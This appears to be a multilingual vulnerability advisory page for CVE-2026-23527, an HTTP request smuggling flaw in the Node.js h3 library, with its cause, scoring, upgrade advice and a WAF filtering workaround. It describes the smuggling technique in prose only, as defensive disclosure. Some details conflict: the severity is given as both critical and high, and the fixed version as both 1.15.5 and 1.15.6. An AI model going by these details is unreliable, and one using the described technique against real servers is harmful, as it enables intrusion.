Plateforme
nodejs
Composant
h3
Corrigé dans
1.15.6
1.15.5
CVE-2026-23527 is a critical HTTP Request Smuggling vulnerability discovered in h3 v1, specifically affecting version 1.15.4. This flaw arises from an incorrect case-sensitive check of the Transfer-Encoding header, allowing attackers to smuggle malicious requests past the server. Successful exploitation can lead to unauthorized access, data manipulation, and potentially broader system compromise. The vulnerability is resolved in version 1.15.5.
The core of this vulnerability lies in h3's mishandling of the Transfer-Encoding header. RFC specifications mandate that this header should be case-insensitive. However, h3 v1.15.4 enforces a strict case-sensitive check, only recognizing "chunked". An attacker can exploit this by sending a request with a mixed-case Transfer-Encoding header, such as "ChuNked". Because h3 fails to recognize this variant, it assumes the body is empty and processes the request prematurely. The actual request body then remains on the socket, ready to be processed as a subsequent, potentially malicious, request. This technique enables attackers to bypass security controls, potentially injecting malicious code or accessing sensitive data. The blast radius extends to any downstream services relying on h3, as the smuggled requests can impact their processing.
CVE-2026-23527 was published on January 15, 2026. The vulnerability's severity is considered HIGH (8.9) according to CVSS. There is no indication of this being on the KEV catalog or having an EPSS score at this time. Public Proof-of-Concept (POC) code is likely to emerge given the ease of exploitation and the well-understood nature of HTTP Request Smuggling techniques. Monitor security advisories and threat intelligence feeds for any reports of active exploitation campaigns targeting h3 deployments.
Statut de l'Exploit
EPSS
0.03% (percentile 8%)
CISA SSVC
Vecteur CVSS
The primary mitigation for CVE-2026-23527 is to upgrade to h3 version 1.15.5 or later, which corrects the case-insensitive header handling. If immediate upgrading is not feasible, consider implementing a Web Application Firewall (WAF) or reverse proxy to filter requests with unusual Transfer-Encoding headers. Specifically, configure the WAF to block requests containing Transfer-Encoding headers with mixed-case or unexpected values. Additionally, review and tighten server-side request parsing logic to ensure robustness against malformed headers. After upgrading, confirm the fix by sending a request with a mixed-case Transfer-Encoding header (e.g., "ChuNked") and verifying that it is correctly rejected.
Actualice la biblioteca h3 a la versión 1.15.5 o superior para mitigar la vulnerabilidad de Request Smuggling. Esta actualización corrige la validación incorrecta del encabezado Transfer-Encoding, asegurando que se manejen correctamente las solicitudes HTTP.
Analyses de vulnérabilités et alertes critiques directement dans votre boîte mail.
It's a HIGH severity HTTP Request Smuggling vulnerability in h3 v1.15.4, allowing attackers to bypass security controls by exploiting case-insensitive header handling.
If you are using h3 v1 version 1.15.4, you are vulnerable. Check your deployments and upgrade immediately.
Upgrade to h3 v1.15.5 or later. As a temporary workaround, implement a WAF to filter requests with unusual Transfer-Encoding headers.
There are no confirmed reports of active exploitation at this time, but the vulnerability is easily exploitable and POC code is likely to emerge.
Refer to the official h3 project documentation and security advisories, as well as the NVD entry for CVE-2026-23527 for further details.
Téléverse ton fichier de dépendances et découvre instantanément si cette CVE et d'autres te touchent.